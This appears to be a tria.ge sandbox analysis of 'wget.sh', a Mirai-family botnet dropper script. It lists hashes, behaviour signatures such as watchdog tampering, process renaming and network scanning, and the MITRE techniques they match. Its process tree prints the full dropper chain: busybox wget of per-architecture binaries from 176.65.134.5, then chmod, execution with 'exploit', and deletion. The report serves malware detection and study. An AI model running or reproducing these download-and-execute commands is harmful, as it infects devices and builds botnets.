Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
07/03/2025, 00:21
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
1KB
-
MD5
a9f753da46e0678e9652f1417378e79a
-
SHA1
19bf100cae7a6a8fa9a42d0368ff1918c9b796ac
-
SHA256
51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a
-
SHA512
3969653a243f80154bbca0045c35e3e8e0b47fdc85bcc13c8887c24e2c207dfd92e3265393ea7d8a28347c67d69501a0d7a2aa2247e116a0705d33731bdce636
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
Contacts a large (177881) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 814 busybox 680 busybox 693 busybox 786 busybox 790 busybox 798 busybox 806 busybox 810 busybox 778 busybox 782 busybox 794 busybox 802 busybox -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/jklarm 682 wget.sh /tmp/jklarm5 694 wget.sh /tmp/jklarm6 779 wget.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog jklarm File opened for modification /dev/misc/watchdog jklarm File opened for modification /dev/watchdog jklarm5 File opened for modification /dev/misc/watchdog jklarm5 -
Renames itself 2 IoCs
pid Process 682 jklarm 694 jklarm5 -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 202.61.197.122 Destination IP 202.61.197.122 Destination IP 185.181.61.24 -
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jklarm File opened for reading /proc/net/tcp jklarm5 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 31 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/781/maps jklarm5 File opened for reading /proc/816/maps jklarm5 File opened for reading /proc/839/maps jklarm5 File opened for reading /proc/797/maps jklarm5 File opened for reading /proc/826/maps jklarm5 File opened for reading /proc/832/maps jklarm5 File opened for reading /proc/845/maps jklarm5 File opened for reading /proc/838/maps jklarm5 File opened for reading /proc/840/maps jklarm5 File opened for reading /proc/844/maps jklarm5 File opened for reading /proc/813/maps jklarm5 File opened for reading /proc/819/maps jklarm5 File opened for reading /proc/821/maps jklarm5 File opened for reading /proc/846/maps jklarm5 File opened for reading /proc/778/maps jklarm5 File opened for reading /proc/785/maps jklarm5 File opened for reading /proc/792/maps jklarm5 File opened for reading /proc/830/maps jklarm5 File opened for reading /proc/827/maps jklarm5 File opened for reading /proc/809/maps jklarm5 File opened for reading /proc/834/maps jklarm5 File opened for reading /proc/836/maps jklarm5 File opened for reading /proc/848/maps jklarm5 File opened for reading /proc/842/maps jklarm5 File opened for reading /proc/793/maps jklarm5 File opened for reading /proc/801/maps jklarm5 File opened for reading /proc/805/maps jklarm5 File opened for reading /proc/822/maps jklarm5 File opened for reading /proc/828/maps jklarm5 File opened for reading /proc/789/maps jklarm5 File opened for reading /proc/825/maps jklarm5 -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself vmstat 682 jklarm Changes the process name, possibly in an attempt to hide itself atd 694 jklarm5 -
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jklarm File opened for reading /proc/net/tcp jklarm5 -
description ioc Process File opened for reading /proc/313/comm jklarm File opened for reading /proc/12/comm jklarm File opened for reading /proc/103/comm jklarm File opened for reading /proc/682/comm jklarm File opened for reading /proc/599/status jklarm File opened for reading /proc/13/comm jklarm5 File opened for reading /proc/41/comm jklarm5 File opened for reading /proc/828/cmdline jklarm5 File opened for reading /proc/1/comm jklarm File opened for reading /proc/303/comm jklarm File opened for reading /proc/660/comm jklarm File opened for reading /proc/148/status jklarm File opened for reading /proc/216/comm jklarm5 File opened for reading /proc/836/cmdline jklarm5 File opened for reading /proc/654/comm jklarm File opened for reading /proc/656/comm jklarm File opened for reading /proc/303/status jklarm File opened for reading /proc/305/status jklarm File opened for reading /proc/322/status jklarm File opened for reading /proc/19/comm jklarm5 File opened for reading /proc/283/comm jklarm5 File opened for reading /proc/216/status jklarm5 File opened for reading /proc/15/comm jklarm File opened for reading /proc/148/comm jklarm File opened for reading /proc/305/comm jklarm File opened for reading /proc/5/comm jklarm5 File opened for reading /proc/599/comm jklarm5 File opened for reading /proc/607/comm jklarm5 File opened for reading /proc/599/status jklarm5 File opened for reading /proc/797/cmdline jklarm5 File opened for reading /proc/13/comm jklarm File opened for reading /proc/160/comm jklarm File opened for reading /proc/655/comm jklarm File opened for reading /proc/322/comm jklarm5 File opened for reading /proc/653/comm jklarm5 File opened for reading /proc/601/status jklarm5 File opened for reading /proc/834/cmdline jklarm5 File opened for reading /proc/216/status jklarm File opened for reading /proc/1/comm jklarm5 File opened for reading /proc/3/comm jklarm5 File opened for reading /proc/6/comm jklarm5 File opened for reading /proc/115/comm jklarm5 File opened for reading /proc/280/comm jklarm5 File opened for reading /proc/313/comm jklarm5 File opened for reading /proc/661/status jklarm5 File opened for reading /proc/601/comm jklarm File opened for reading /proc/7/comm jklarm File opened for reading /proc/599/comm jklarm File opened for reading /proc/313/status jklarm File opened for reading /proc/12/comm jklarm5 File opened for reading /proc/24/comm jklarm5 File opened for reading /proc/26/comm jklarm5 File opened for reading /proc/284/comm jklarm5 File opened for reading /proc/9/comm jklarm File opened for reading /proc/43/comm jklarm File opened for reading /proc/654/comm jklarm5 File opened for reading /proc/660/comm jklarm5 File opened for reading /proc/727/comm jklarm5 File opened for reading /proc/608/status jklarm5 File opened for reading /proc/660/status jklarm5 File opened for reading /proc/781/cmdline jklarm5 File opened for reading /proc/4/comm jklarm File opened for reading /proc/5/comm jklarm File opened for reading /proc/648/comm jklarm -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 789 busybox 791 jklmips 792 busybox -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklarm6 busybox File opened for modification /tmp/jklarm busybox File opened for modification /tmp/jklarm5 busybox
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Executes dropped EXE
PID:656 -
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm -O jklarm2⤵
- Writes file to tmp directory
PID:657
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/jklarm./jklarm exploit2⤵
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:682
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵PID:684
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/jklarm5./jklarm5 exploit2⤵
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:694
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵PID:761
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/jklarm6./jklarm6 exploit2⤵PID:779
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵PID:780
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm72⤵PID:781
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/jklarm7./jklarm7 exploit2⤵PID:783
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵PID:784
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k2⤵PID:785
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/jklm68k./jklm68k exploit2⤵PID:787
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵PID:788
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmips -O jklmips2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/jklmips./jklmips exploit2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
PID:792
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl2⤵PID:793
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/jklmpsl./jklmpsl exploit2⤵PID:795
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵PID:796
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklppc -O jklppc2⤵PID:797
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/jklppc./jklppc exploit2⤵PID:799
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵PID:800
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh42⤵PID:801
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/jklsh4./jklsh4 exploit2⤵PID:803
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵PID:804
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklspc -O jklspc2⤵PID:805
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/jklspc./jklspc exploit2⤵PID:807
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵PID:808
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklx86 -O jklx862⤵PID:809
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/jklx86./jklx86 exploit2⤵PID:811
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵PID:812
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarc -O jklarc2⤵PID:813
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/jklarc./jklarc exploit2⤵PID:815
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵PID:816
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵PID:817
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
55KB
MD5a2e0300a38d49740dd9af7820f2e2b6b
SHA182fc641a38383412bb88dd5cdb83d45a8315daa5
SHA256fc96aa360ca3f3318444f338f9131a9a43c00beb3e812e639cfe80f07219c9a7
SHA512cc4906d1088a9191ade954aa1637ade08e6e7278bb4b541a0af0549bb876b3adcb7ba5cc94acf3e455d1e65e5f6afce36b1556129b95a53392aae72112f3bfa6
-
Filesize
55KB
MD56808c976ae3e0456efb6e6fc4e1a8423
SHA1d9b7a61a16aa0e2875b04ff7eac22e72fc15a24e
SHA256270336c1d58b1ffaa8ebba18d47d73c2451fa149194f37cc44e980ac96cf1443
SHA5128b890a0f2d216b8041577412b2d7d4f9524caf0d185f45d48ce7df781fce05e0148e3f767dfc6bb76931a9237e6a26b80decae63a7685760727a8b9716855917
-
Filesize
65KB
MD52c56a6803c9b541e037c5501da6def2f
SHA15b5787622aa43f619ecd49c1659f769f9bb812cc
SHA256906399d69e39253d0551c6bf9c59451b2ee12e5e7e8ac557040b38c6b813e711
SHA512b799bea5f2a69cf97abe1a5b6acb64f4488430a06555ae511a2e0f2e8177ae4c021560914544fd8fbb4a1490f7a686cee8be78c1bd2830305b8d780f79a8e109